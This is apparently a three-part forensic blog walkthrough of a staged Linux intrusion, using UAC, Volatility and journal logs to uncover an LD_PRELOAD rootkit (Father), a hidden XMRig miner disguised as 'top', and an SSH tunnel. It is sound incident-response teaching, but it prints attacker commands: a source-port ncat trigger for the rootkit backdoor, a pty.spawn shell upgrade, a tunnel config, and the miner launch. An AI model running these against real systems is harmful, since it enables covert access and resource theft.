Linux Investigation (Part 3)

Please read Part 1 and Part 2 for additional background

We’ve actually done quite well reconstructing the major points of our intrusion scenario, but there are definitely some lingering questions. Let’s see if we can dive deeper into some of these artifacts.

LD_PRELOAD Rootkit Or Not?

It would be nice to positively identify libymv.so.3 as an LD_PRELOAD rootkit, rather than just referring to it as the “suspicious library”. Fortunately we have a memory image and can use Volatility to extract the library. We can use linux.elfs to dump all the objects associated with a PID. We believe that the SSH daemon was explicitly restarted to pick up libymv.so.3, so we’ll dump that process. As we saw in Part 2, that PID is 937.

(venv) $ mkdir dump-elfs-pid-937
(venv) $ vol -q -f memory_dump/avml.lime -o dump-elfs-pid-937 linux.elfs --pid 937 --dump
Volatility 3 Framework 2.27.1

PID Process Start End File Path File Output

937 sshd 0x55e3f52a9000 0x55e3f52b2000 /usr/sbin/sshd pid.937.sshd.0x55e3f52a9000.dmp
937 sshd 0x7f7da1093000 0x7f7da1098000 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7 pid.937.sshd.0x7f7da1093000.dmp
937 sshd 0x7f7da115d000 0x7f7da1160000 /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.14.0 pid.937.sshd.0x7f7da115d000.dmp
937 sshd 0x7f7da120c000 0x7f7da1234000 /usr/lib/x86_64-linux-gnu/libc.so.6 pid.937.sshd.0x7f7da120c000.dmp
937 sshd 0x7f7da1400000 0x7f7da14f7000 /usr/lib/x86_64-linux-gnu/libcrypto.so.3 pid.937.sshd.0x7f7da1400000.dmp
937 sshd 0x7f7da1a3c000 0x7f7da1a3f000 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1 pid.937.sshd.0x7f7da1a3c000.dmp
937 sshd 0x7f7da1a5e000 0x7f7da1a65000 /usr/lib/x86_64-linux-gnu/libselinux.so.1 pid.937.sshd.0x7f7da1a5e000.dmp
937 sshd 0x7f7da1aa5000 0x7f7da1aa7000 /usr/lib/x86_64-linux-gnu/libymv.so.3 pid.937.sshd.0x7f7da1aa5000.dmp
937 sshd 0x7f7da1ab3000 0x7f7da1ab5000 [vdso] pid.937.sshd.0x7f7da1ab3000.dmp
937 sshd 0x7f7da1ab5000 0x7f7da1ab6000 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 pid.937.sshd.0x7f7da1ab5000.dmp
937 sshd 0x7f7da1ade000 0x7f7da1ae9000 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 pid.937.sshd.0x7f7da1ade000.dmp

libymv.so.3 was extracted to dump-elfs-pid-937/pid.937.sshd.0x7f7da1aa5000.dmp. We could go full tilt at this and load it up for static analysis, but in the middle of an incident I’m much more likely to do a first pass using “strings” and an internet search engine.
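My first pass is nothing fancy (the dump file name comes straight from the linux.elfs output above):

(venv) $ strings -a dump-elfs-pid-937/pid.937.sshd.0x7f7da1aa5000.dmp | less

Here are some of the more interesting strings I see in this sample: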

lpe_drop_shell
timebomb
backconnect
Enjoy the shell!
/tmp/silly.txt

Running those terms through my favorite search engine, my first hit was this useful list of rootkit IOCs. Apparently these strings are indicators for the Father rootkit.

If you look at the documentation for Father, it allows process, file, and directory hiding via a hard-coded GID. In our case this is apparently GID 7823, as we saw in Part 2. Father also has an accept() hook backdoor, which is activated by connecting to any network service on the system from a hard-coded source port. Based on the linux.sockstat output, this appears to be port 48411 in our case.
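Purely as an illustration of the mechanism (this is my reconstruction, not a command captured in the evidence), forcing a fixed source port on the client side is trivial with a tool like ncat:

attacker$ ncat -p 48411 192.168.4.22 22

Any listening service would do. The rootkit’s accept() hook checks the source port before the real daemon logic ever sees the connection, which is consistent with the unencrypted shell we saw spawned directly from the master SSH daemon in Part 2.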

Father also has a PAM hook that steals user passwords and saves them to /tmp/silly.txt. UAC captured this file for us:

(venv) $ cat \[root\]/tmp/silly.txt 
100:1:password:worker

“worker” is the password for the worker account. The rest of the values here are hard-coded in the Father source code and are meaningless.

So even without static analysis I’m willing to state with high confidence that libymv.so.3 is the Father LD_PRELOAD rootkit. And since I implanted it into the system, I can also state authoritatively that this is exactly what the library is.

Is top Really XMRig?

Let’s try a different approach to discover whether our suspicious “top” process is really XMRig, as the command history we extracted in Part 2 suggests. linux.proc.Maps allows us to dump the memory space of a process.

(venv) $ mkdir dump-mem-pid-977
(venv) $ vol -q -f memory_dump/avml.lime -o dump-mem-pid-977 linux.proc.Maps --pid 977 --dump
Volatility 3 Framework 2.27.1

PID Process Start End Flags PgOff Major Minor Inode File Path File output

977 top 0x400000 0x401000 r-- 0x0 0 26 7 /dev/shm/kit/top (deleted) pid.977.vma.0x400000-0x401000.dmp
977 top 0x401000 0xa5f000 r-x 0x1000 0 26 7 /dev/shm/kit/top (deleted) pid.977.vma.0x401000-0xa5f000.dmp
977 top 0xa5f000 0xc40000 r-- 0x65f000 0 26 7 /dev/shm/kit/top (deleted) pid.977.vma.0xa5f000-0xc40000.dmp
[...]
(venv) $ grep -rlF xmrig dump-mem-pid-977/
dump-mem-pid-977/pid.977.vma.0xa5f000-0xc40000.dmp
(venv) $ strings -a dump-mem-pid-977/pid.977.vma.0xa5f000-0xc40000.dmp
[...]
Usage: xmrig [OPTIONS]
Network:
-o, --url=URL URL of mining server
-a, --algo=ALGO mining algorithm https://xmrig.com/docs/algorithms
--coin=COIN specify coin instead of algorithm
[...]

Finding the help text for the xmrig program in memory is conclusive enough for me. This is not a terribly surprising result, but it is nice to have additional confirmation.

Note that I tried a similar approach with linux.proc.Maps to recover the “config” file from the outbound SSH process (PID 975), but was unsuccessful. However, while searching the memory strings for “:3333”, you can see some of the chatter from the XMRig process going down the SSH tunnel.
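That search was nothing more exotic than the following (the dump directory name is my own convention from the PID 975 linux.proc.Maps run):

(venv) $ strings -a dump-mem-pid-975/*.dmp | grep -F :3333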

[...]
4a747a5e140b7eb34933347c5154cb3d671bedc2e83b3a5e16f1603a4b660000
127.0.0.1:3333
method":"submit","params":{"id":"c1dcc2a9","job_id":"77","nonce":"ef000000","result":"982e4063bea92330be26b808c7d21d3fc349bc06f0c232fd673b7a827ab30000","algo":"rx/0"}}
"cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/yada","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
[...]

Timeline Analysis

I’m passionate about timeline analysis and will often use it in the early stages of a case to find indicators. In this case, however, we’ve been so successful with the other evidence sources that UAC provided that timeline analysis hasn’t been a priority. Now we can use it to fill in any details we might have missed.

First we need to create the timeline from the body file provided by UAC with the help of the Sleuthkit’s mactime tool (“mactime -d -y -b bodyfile/bodyfile.txt > bodyfile/timeline.csv”). Alternatively, you could use my ptt.sh script, which creates a timeline that merges file system information with security log information, including user logins, Sudo commands, etc.

After loading the timeline into our CSV viewer of choice, we can jump to 2026-03-24 23:22:19, the time of the “worker” login for the session where the Father rootkit was implanted. As usual there is a lot of noise, but the timeline generally confirms the events we have already discovered.
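If you prefer the command line to a CSV viewer, a quick grep will drop you at the same spot (mactime’s “-y” option gives ISO-style dates, so matching on the time string works):

$ grep -n '23:22:19' bodyfile/timeline.csv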

Recall from Part 1 that the logs showed us a brief SSH session at 23:23:48. This session was not logged in /var/log/wtmp, indicating that it most likely was a single command or scp session that was not allocated a PTY and did not spawn an interactive shell. The timeline shows that at 23:23:48 the last access time on the “/run/shm -> /dev/shm” symlink was updated. Does this mean that the SSH connection at 23:23:48 was how the /dev/shm/kit directory was staged? This is certainly a plausible explanation, but not conclusive.

We know that the Father rootkit captures passwords in the file /tmp/silly.txt. The timeline shows us that this file was created at 23:34:32, which is when the SOC logged in as user worker to collect system data with UAC. This is just further confirmation that the Father rootkit was operational on the system.
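As with the other file system artifacts, we can pull the timestamps for this file straight from the body file:

$ grep -F tmp/silly.txt bodyfile/bodyfile.txt | bodystat.sh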

Wrapping Up

At this point, we have answers for the important questions for the scenario:

  1. Is the system compromised? Definitely yes!
  2. How did the attackers gain access to the system? They logged in as user “worker“, using the account password “worker“. This password was easily guessable, or it may have been disclosed or stolen. User “worker” had unlimited Sudo access, so privilege escalation was trivial.
  3. Why is there unencrypted traffic on port 22/tcp? The attacker installed a rootkit that creates a backdoor in any networked service on the system, giving any user connecting from source port 48411/tcp a root shell on the system.
  4. What is consuming CPU on the system? Process ID 977 is the XMRig cryptocurrency miner running under the executable name “top“. This process is connecting out through an SSH tunnel (PID 975) to 192.168.5.95, a system that is now in scope and must be investigated.
  5. Why can’t the SOC see what is happening on the system? The rootkit installed by the attacker is hiding the processes spawned from the attacker’s backdoor session, including the cryptocurrency miner.

Here is our final timeline of important events during the incident:

23:22:19  User "worker" logs in with password from jump host (192.168.4.35) port 48364 [logs]
23:23:34  User "worker" uses sudo to execute root shell [logs]
23:23:48  Command-only/scp as user "worker" from jump host port 55504 [logs]
23:23:48  atime update on /dev/shm symlink, possible rootkit staging [bodyfile]
23:24:51  Father rootkit installed as /usr/lib/x86_64-linux-gnu/libymv.so.3 [bodyfile]
23:25:09  /etc/ld.so.preload created, points to .../libymv.so.3 [chkrootkit]
23:25:19  SSH daemon restarted [logs]
23:26:07  Unencrypted connect from 192.168.4.35 port 48411 via Father rootkit hook [memory]
23:26:22  python3 execution to promote raw shell [memory]
23:26:22  Hidden bash process started from python pty.spawn() [memory]
23:27:16  User "worker" SSH session from jump host port 48364 ends [logs]
23:27:51  /dev/shm/kit/xmrig renamed to "top" [memory]
23:28:17  ssh to 192.168.5.95 with tunnel on 3333/tcp [memory]
23:29:09  "top" process (renamed xmrig) started, comms via SSH tunnel [memory]
23:29:19  /dev/shm/kit removed [memory]
23:34:32  SOC logs in to start collecting data with UAC [logs]
23:34:32  Father rootkit stores "worker" password in /tmp/silly.txt [bodyfile]

Those of you who conducted your own investigation may have been thrown off by earlier artifacts left behind by my aborted attempts to create the scenario data. For example, there are login failures as user “worker” that could be construed as a brute force attack against this account, system crashes, and errors with libymv.so.3. My intention was that the scenario started with the login at 23:22:19, but kudos to those of you who found the earlier artifacts and invented plausible explanations for them.

Some submissions noted the fact that the kernel taint warning was triggered and speculated about a possible kernel rootkit. But only one submission actually ran down the source of the taint warning and realized it was due to the VirtualBox guest additions and not enemy action. This is serious investigative dedication! Bravo!

One last part of this series is yet to come. I will be walking through what I actually did to create the scenario activity so that you can compare your answers with what really happened. In the meantime, don’t forget to check out the reports from the contest winners.

Linux Investigation (Part 2)

Please read the previous installment of this investigation for additional background.

Having identified a potential LD_PRELOAD rootkit, I’m very curious to discover what the memory dump from the system can tell us. Note that before you can begin analyzing the memory for yourself you will need to (a) install Volatility, and (b) install a Linux symbol table that will work for this memory dump into .../volatility3/symbols/linux (Volatility 3 uses symbol tables rather than the old Volatility 2 profiles).

Process Information

One approach for finding suspicious processes is to look at the process hierarchy with linux.pstree. The Linux process hierarchy is usually rather flat, so interactive sessions tend to stand out:

(venv) $ vol -q -f memory_dump/avml.lime linux.pstree
[...]
* 0x8c7cc67e1980 937 937 1 sshd
** 0x8c7cc8278000 939 939 937 sh
*** 0x8c7cc67e4c80 940 940 939 python3
**** 0x8c7cc6011980 941 941 940 bash
***** 0x8c7cc6014c80 975 975 941 ssh
** 0x8c7cc81b1980 1005 1005 937 sshd-session
*** 0x8c7cc08b8000 1047 1047 1005 sshd-session
**** 0x8c7cc8354c80 1064 1064 1047 bash
***** 0x8c7cc351b300 1076 1076 1064 sudo
****** 0x8c7cc3859980 1078 1078 1076 sudo
******* 0x8c7cc039cc80 1079 1079 1078 bash
******** 0x8c7da0131980 119319 119319 1079 avml
[...]

The second hierarchy starting with PID 1005 is what SSH sessions normally look like: two sshd-session processes (privilege separation), then the login shell. The double sudo is an interesting wrinkle, but apparently an artifact of this user doing “sudo -s” to start a root shell rather than just “sudo bash“. Then we have the bash shell itself, where the user is running avml to grab the memory dump we are currently reviewing. This is more or less as expected.

The process hierarchy starting with PID 939, however, is just plain weird. The shell process with PID 939 is spawned directly out of the master SSH daemon, PID 937. This suggests some sort of exploit against the SSH daemon itself. Next comes a Python process (PID 940). Could this be the Python command from the original SOC report? Certainly PID 940 spawned a bash shell (PID 941), which matches what the SOC told us. That bash shell ran “ssh“– the SSH client program. What is going on here?

We can get more detail on these processes from the linux.psaux plugin:

(venv) $ vol -q -f memory_dump/avml.lime linux.psaux
[...]
939 937 sh /bin/sh
940 939 python3 python3 -c import pty; pty.spawn("/bin/bash")
941 940 bash /bin/bash
[...]
975 941 ssh ssh -F config ymv
[...]

That’s definitely the Python command line the SOC reported to us. Apparently whatever is happening in the PID 939 shell is not happening inside of an encrypted session. This also tends to point towards some sort of pre-encryption and therefore pre-authentication compromise of the master SSH daemon. Recall from our log analysis in the last installment that the /etc/ld.so.preload file containing the path of the suspected rootkit library was created immediately before the SSH daemon was restarted. Are we looking at rootkit functionality for the SSH daemon compromise?

It’s also worth considering the ssh command line (PID 975). “-F config” means read client options from a file called “config“, but where was that file dropped to disk? Also, the SOC and the system admins for the machine have no idea what the host “ymv” is; it does not resolve within this network. The best guess is that “ymv” refers to a host alias defined in the “config” file, wherever that ended up.

Command History From Memory

UAC didn’t find command history on disk, but the attacker’s bash shell was still active at the time the memory image was taken. So that command history should be in the memory dump.

(venv) $ vol -q -f memory_dump/avml.lime linux.bash --pid 941
Volatility 3 Framework 2.27.1

PID Process CommandTime Command

941 bash 2026-03-24 23:26:26.000000 UTC rest
941 bash 2026-03-24 23:26:30.000000 UTC reset
941 bash 2026-03-24 23:26:44.000000 UTC echo $SHELL
941 bash 2026-03-24 23:26:54.000000 UTC id
941 bash 2026-03-24 23:27:25.000000 UTC cd /dev/shm/kit
941 bash 2026-03-24 23:27:26.000000 UTC ls
941 bash 2026-03-24 23:27:51.000000 UTC mv xmrig top
941 bash 2026-03-24 23:27:59.000000 UTC export PATH=.:$PATH
941 bash 2026-03-24 23:28:17.000000 UTC ssh -F config ymv
941 bash 2026-03-24 23:28:28.000000 UTC bg
941 bash 2026-03-24 23:29:09.000000 UTC top -o 127.0.0.1:3333 -B
941 bash 2026-03-24 23:29:15.000000 UTC cd ..
941 bash 2026-03-24 23:29:19.000000 UTC rm -rf kit
941 bash 2026-03-24 23:29:24.000000 UTC ps -ef | grep top
941 bash 2026-03-24 23:29:36.000000 UTC ls

This shell history is extremely useful. After what is apparently an initial typo, the user executes a “reset” command, which is part of the typical recipe for elevating a raw shell to fully interactive via the Python pty.spawn() method. Our user then checks which shell they are in (“echo $SHELL“) and what user they are running as (“id“). This is classic post-exploit behavior: a typical user in a normal interactive session would not need to run these commands.

The user then changes to a directory named /dev/shm/kit. This is not a typical directory on this system, so where did it come from? The fact that it was staged in /dev/shm–a memory-based file system–is suspicious. This would be a good place for an attacker to stage files that they did not want to write to the system’s local disk.

Inside this directory was apparently a file named “xmrig“. XMRig is a popular Monero cryptocurrency miner. The user renames this file to “top” and later executes this “top” program from the /dev/shm/kit directory. “export PATH=.:$PATH” adds the current working directory to the front of the search path, followed later by “top -o 127.0.0.1:3333 -B” to execute the program. Note that the command line arguments to this “top” program match typical xmrig arguments– “-o 127.0.0.1:3333” to specify the mining infrastructure to connect to, and “-B” to run in the background as a daemon.

After starting the renamed xmrig, we see the user remove /dev/shm/kit (“cd ..“, “rm -rf kit“). This will not impact the running processes that were started here, but will make it more difficult for inexperienced investigators to find these files. We also see the user checking that their “top” program is still running or perhaps that it is invisible (“ps -ef | grep top“), and making sure that /dev/shm/kit is gone (“ls“).

But what is happening on localhost 3333/tcp? In between the “mv” command to rename the binary and executing the renamed xmrig as “top” we see “ssh -F config ymv” (later set to run in the background with “bg“) which we also saw in the linux.psaux output. Note that this command history implies that the “config” file was in /dev/shm/kit, now deleted.

It seems reasonable to assume that 127.0.0.1:3333 is an SSH tunnel. But can we find artifacts in memory to prove that?

Network Details

The linux.sockstat plugin should give us some insight into the network behavior on the system:

(venv) $ vol -q -f memory_dump/avml.lime linux.sockstat | grep -F 3333 | sort -u
4026531840 libuv-worker 977 979 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 libuv-worker 977 980 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 libuv-worker 977 981 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 libuv-worker 977 982 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 ssh 975 975 4 0x8c7cc404a900 AF_INET6 STREAM TCP ::1 3333 :: 0 LISTEN -
4026531840 ssh 975 975 5 0x8c7cc4043900 AF_INET STREAM TCP 127.0.0.1 3333 0.0.0.0 0 LISTEN -
4026531840 ssh 975 975 6 0x8c7cc405e880 AF_INET STREAM TCP 127.0.0.1 3333 127.0.0.1 59182 ESTABLISHED -
4026531840 top 977 977 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 top 977 978 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 top 977 987 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 top 977 988 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 top 977 989 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 top 977 990 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -

The suspicious SSH process that was started (PID 975) is definitely listening on 127.0.0.1:3333. There is no “-L” option showing on the command line, so we presume the tunnel configuration is in the “config” file mentioned on the command line (“-F config“).

We can also see the “top” process, which is the renamed xmrig binary, actively talking on this port. This is consistent with the “-o 127.0.0.1:3333” option we saw in the command history. XMRig uses libuv for thread management, which is where the libuv-worker processes come from. Note that the top and libuv-worker entries share the same PID (977 in the third column of output) but different thread IDs (fourth column of output above).
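If the per-thread duplicates are cluttering your view, you can limit the output to thread group leaders by keeping only rows where the PID and TID columns match:

(venv) $ vol -q -f memory_dump/avml.lime linux.sockstat | awk '$3 == $4'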

But where is the SSH process connecting to? Let’s check the linux.sockstat output again:

(venv) $ vol -q -f memory_dump/avml.lime linux.sockstat | awk '$3 == "975"'
4026531840 ssh 975 975 3 0x8c7cc405cc00 AF_INET STREAM TCP 192.168.4.22 33440 192.168.5.95 22 ESTABLISHED -
4026531840 ssh 975 975 4 0x8c7cc404a900 AF_INET6 STREAM TCP ::1 3333 :: 0 LISTEN -
4026531840 ssh 975 975 5 0x8c7cc4043900 AF_INET STREAM TCP 127.0.0.1 3333 0.0.0.0 0 LISTEN -
4026531840 ssh 975 975 6 0x8c7cc405e880 AF_INET STREAM TCP 127.0.0.1 3333 127.0.0.1 59182 ESTABLISHED -

The outbound connection is to 192.168.5.95. We understood from the initial SOC report that all access to the system we are investigating is supposed to go through a jump host at 192.168.4.35, so this is a new system we have not heard of. The IP address is internal, and we will need to investigate this system to find out whether it too has been compromised. The scope of our investigation is growing!
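As an aside, we never recovered the attacker’s “config” file, but based on the sockets above a minimal reconstruction might have looked something like this (every line here is a guess that merely fits the evidence):

Host ymv
    HostName 192.168.5.95
    # The local listener on 3333 is confirmed by sockstat; the remote-side target is a guess
    LocalForward 3333 127.0.0.1:3333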

We can also use linux.sockstat to investigate where our mysterious unencrypted SSH traffic is originating from. Here I am focusing in on only the activity related to the initial “sh” process (PID 939) that was created:

(venv) $ vol -q -f memory_dump/avml.lime linux.sockstat | awk '$3 == "939"'
4026531840 sh 939 939 0 0x8c7cc4059300 AF_INET STREAM TCP 192.168.4.22 22 192.168.4.35 48411 ESTABLISHED -
4026531840 sh 939 939 1 0x8c7cc4059300 AF_INET STREAM TCP 192.168.4.22 22 192.168.4.35 48411 ESTABLISHED -
4026531840 sh 939 939 2 0x8c7cc4059300 AF_INET STREAM TCP 192.168.4.22 22 192.168.4.35 48411 ESTABLISHED -
4026531840 sh 939 939 8 0x8c7cc4059300 AF_INET STREAM TCP 192.168.4.22 22 192.168.4.35 48411 ESTABLISHED -

It appears that this connection originated from the jump host system, 192.168.4.35 (source port 48411).

Detailed Process Information

The linux.pslist plugin will give us process start times as well as UID and GID info for all of our suspicious processes. The linux.pslist output is quite busy, so allow me to summarize the important pieces of info:

Process   PID  PPID  UID  GID   Started (UTC)
sh        939  937   0    7823  2026-03-24 23:26:07
python3   940  939   0    7823  2026-03-24 23:26:22
bash      941  940   0    7823  2026-03-24 23:26:22
ssh       975  941   0    7823  2026-03-24 23:28:32
top       977  1     0    7823  2026-03-24 23:29:24

One item that jumps out is that all of the processes are running as root (UID zero), but with the GID 7823. No other processes in the output are using this GID and the GID does not appear in the /etc/group file captured by UAC ([root]/etc/group). Rootkits will often use a group ID value to mark processes, files, and directories that should be hidden by the rootkit. That may be what is happening here.
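A quick check of the UAC copy of /etc/group confirms that the system knows nothing about this GID (no output means no match):

$ grep -w 7823 \[root\]/etc/group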

Also note that the PPID of the “top” process is 1, which is systemd. This is an artifact of the “-B” option that was used to invoke the program. This option tells the process to run in the background like any other daemon process. In doing so the “top” process disassociates itself from the shell that spawned it and is reparented to PID 1. This is also why the “top” process did not appear in the linux.pstree process hierarchy while the “ssh” command did.

Note that the start times for the “ssh” and “top” processes reported by linux.pslist differ from the timestamps from the command history. The linux.pslist times are approximately 15 seconds later than the corresponding command history timestamps. I have no explanation for this discrepancy, but will stick with the timestamps from the command history for consistency.

Status Check And Next Steps

Our timeline is filling in nicely. I’ve added a note at the end of each item to remind us where the information comes from:

23:22:19  User "worker" logs in with password from jump host (192.168.4.35) port 48364 [logs]
23:23:34  User "worker" uses sudo to execute root shell [logs]
23:23:48  Command-only/scp as user "worker" from jump host port 55504 [logs]
23:24:51  /usr/lib/x86_64-linux-gnu/libymv.so.3 created [bodyfile]
23:25:09  /etc/ld.so.preload created, points to .../libymv.so.3 [chkrootkit]
23:25:19  SSH daemon restarted [logs]
23:26:07  Unencrypted connect from 192.168.4.35 port 48411 spawns hidden sh (PID 939) [memory]
23:26:22  python3 execution to promote raw shell [memory]
23:26:22  Hidden bash process started from python pty.spawn() [memory]
23:27:16  User "worker" SSH session from jump host port 48364 ends [logs]
23:27:51  /dev/shm/kit/xmrig renamed to "top" [memory]
23:28:17  ssh to 192.168.5.95 with tunnel on 3333/tcp [memory]
23:29:09  "top" process (renamed xmrig) started, comms via SSH tunnel [memory]
23:29:19  /dev/shm/kit removed [memory]

From the timeline it appears that the suspicious library was planted during the original “worker” login session that started at 23:22:19. But once the hidden session was established and promoted via pty.spawn(), the legitimate login closed down. The hidden session was responsible for starting the SSH tunnel to 192.168.5.95 and running the renamed XMRig.

But there are still so many questions. How and when did the /dev/shm/kit directory and the suspicious library get onto the system in the first place? Can we recover any of the suspect files: “libymv.so.3“, “top“, and the “config” file used for the SSH connection? Is “libymv.so.3” really an LD_PRELOAD rootkit as suspected? What else did the attacker accomplish on the system? More investigation in the next installment!

Linux Investigation (Part 1)

I recently posted a Linux scenario that I had mocked up and asked for people to submit write-ups for judging. The winners have now been announced. Congratulations to all who participated!

I also wanted to provide an analysis of my own. Obviously, I know exactly what happened because I did everything. But I’m going to approach this investigation as if I were coming in cold, without any prior knowledge.

The scenario starts with an alert from the SOC containing two important pieces of information:

  • Unencrypted traffic on port 22/tcp, specifically the string “python3 -c 'import pty; pty.spawn("/bin/bash")'
  • Heavy CPU usage but no process can be seen consuming the CPU

We have a UAC collection from the machine, including a full memory dump.

Initial Triage

“Heavy CPU usage but no process can be seen consuming the CPU” sounds a lot like a rootkit hiding processes to me, but let’s just confirm the SOC finding first. UAC collects the output from “top -b -n1” (live_response/process/top_-b_-n1.txt), and here’s the first part of that file:

top - 19:38:21 up 15 min,  1 user,  load average: 4.38, 3.44, 1.81
Tasks: 132 total, 1 running, 131 sleeping, 0 stopped, 0 zombie
%Cpu(s): 97.7 us, 2.3 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
MiB Mem : 7947.4 total, 5206.4 free, 2780.6 used, 194.6 buff/cache
MiB Swap: 1101.0 total, 1097.7 free, 3.3 used. 5166.7 avail Mem

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1 root 20 0 23812 14824 10756 S 0.0 0.2 0:00.70 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
3 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pool_wo+

[...]

Looking at the “%Cpu(s)” line, the CPU is indeed maxed out at 97.7% user time. The process listing below the header information should be sorted by CPU utilization, but we see nothing that remotely accounts for the amount of CPU being consumed. Seems like the SOC made a good read here.

UAC has some modules that look for common rootkit indicators, so we look in the “chkrootkit” directory in the UAC output and hit pay dirt (for those of you playing along at home, the bodystat.sh script is available from my GitHub):

$ ls chkrootkit/
etc_ld_so_preload.txt stat_etc_ld_so_preload.txt
$ cat chkrootkit/etc_ld_so_preload.txt
/lib/x86_64-linux-gnu/libymv.so.3
$ cat chkrootkit/stat_etc_ld_so_preload.txt
0|/etc/ld.so.preload|837578|-rw-r--r--|0|0|34|1774394719|1774394709|1774394709|1774394709
$ cat chkrootkit/stat_etc_ld_so_preload.txt | bodystat.sh
File: /etc/ld.so.preload
Size: 34 UID: 0 GID: 0 Inode: 837578
Access: 2026-03-24 23:25:19
Modify: 2026-03-24 23:25:09
Change: 2026-03-24 23:25:09
Birth: 2026-03-24 23:25:09
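For reference, the body file fields are MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime. If you don’t have bodystat.sh handy, the raw epoch values decode easily with date(1):

$ date -u -d @1774394709 '+%F %T'
2026-03-24 23:25:09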

$ grep -F lib/x86_64-linux-gnu/libymv.so.3 bodyfile/bodyfile.txt | bodystat.sh
File: /usr/lib/x86_64-linux-gnu/libymv.so.3
Size: 24024 UID: 0 GID: 0 Inode: 715378
Access: 2026-03-24 23:25:19
Modify: 2026-03-24 23:24:51
Change: 2026-03-24 23:24:51
Birth: 2026-03-24 23:24:51

We have a suspicious /etc/ld.so.preload file containing the library path /lib/x86_64-linux-gnu/libymv.so.3, which resolves to /usr/lib/x86_64-linux-gnu/libymv.so.3 via the usual /lib symlink. This libymv.so.3 file was created at 2026-03-24 23:24:51 UTC and /etc/ld.so.preload at 23:25:09.

There are many directions our investigation could go from this point, but I got curious to see if we could tie those file creation times to a particular login session on the machine. A quick look at live_response/system/last_-i.txt in the UAC data shows the following:

worker   pts/0        192.168.4.35     Tue Mar 24 19:34 - still logged in
worker   pts/0        192.168.4.35     Tue Mar 24 19:22 - 19:27  (00:04)
reboot   system boot  6.12.74+deb13+1- Tue Mar 24 19:21 - still running
[...]

There’s a time discrepancy here. If we assume that the session starting at 19:34 is the one where the UAC collection was made, it apparently began four hours before the suspicious library arrived at 23:24:51. I suspect a local time zone issue.

$ ls -l \[root\]/etc/localtime
lrwxrwxrwx 1 hal hal 36 Mar 24 15:48 '[root]/etc/localtime' -> /usr/share/zoneinfo/America/New_York

The “last” output will be in the default time zone for the machine, which is apparently US/Eastern time. That’s four hours earlier than UTC at this time of year.

With that in mind, the creation times on our suspicious files line up nicely with the four minute session by user “worker” from 23:22 – 23:27 UTC (represented in the output above as 19:22 – 19:27). Unfortunately, UAC did not capture a .bash_history file for either the “worker” user or the “root” account. Anti-forensics is a possibility worth noting, but for now we don’t have any useful command history.

Looking at the security logs should provide more details about that login session. The only logs available are the Systemd journal, so it’s time to work some magic with journalctl.

$ journalctl -D \[root\]/var/log/journal/ -q -o short-iso --facility=auth,authpriv | grep -vE '(pam_unix|systemd-logind)'
[...]
2026-03-24T23:22:19+0000 vbox sshd-session[834]: Accepted password for worker from 192.168.4.35 port 48364 ssh2
2026-03-24T23:23:34+0000 vbox sudo[910]: worker : TTY=pts/0 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
2026-03-24T23:23:48+0000 vbox sshd-session[914]: Accepted password for worker from 192.168.4.35 port 55504 ssh2
2026-03-24T23:23:48+0000 vbox sshd-session[923]: Received disconnect from 192.168.4.35 port 55504:11: disconnected by user
2026-03-24T23:23:48+0000 vbox sshd-session[923]: Disconnected from user worker 192.168.4.35 port 55504
2026-03-24T23:25:19+0000 vbox sshd[801]: Received signal 15; terminating.
2026-03-24T23:25:19+0000 vbox sshd[937]: Server listening on 0.0.0.0 port 22.
2026-03-24T23:25:19+0000 vbox sshd[937]: Server listening on :: port 22.
2026-03-24T23:27:16+0000 vbox sshd-session[834]: syslogin_perform_logout: logout() returned an error
2026-03-24T23:27:16+0000 vbox sshd-session[873]: Received disconnect from 192.168.4.35 port 48364:11: disconnected by user
2026-03-24T23:27:16+0000 vbox sshd-session[873]: Disconnected from user worker 192.168.4.35 port 48364
[...]

The “worker” user logs in (with a password) at 23:22:19, and uses sudo to get a root shell at 23:23:34.

But at 23:23:48, we see a second SSH session for “worker” that did not appear in the “last” output. Typically this means that the session did not spawn an interactive shell and was not allocated a PTY. That would indicate that the session only ran a single command specified by the remote user on their command line, or was possibly an scp. This idea is supported by the fact that the session connected and disconnected in the same second.
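Purely for illustration (the file name and remote command here are hypothetical), either of these client invocations would produce exactly this log pattern: no PTY, no wtmp entry, and a connect and disconnect within the same second:

attacker$ ssh worker@192.168.4.22 'uname -a'
attacker$ scp kit.tar.gz worker@192.168.4.22:/dev/shm/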

At 23:25:19 we see the SSH server restarted. Curiouser and curiouser.

What We Know So Far

At this point we’re starting to build a timeline of the incident:

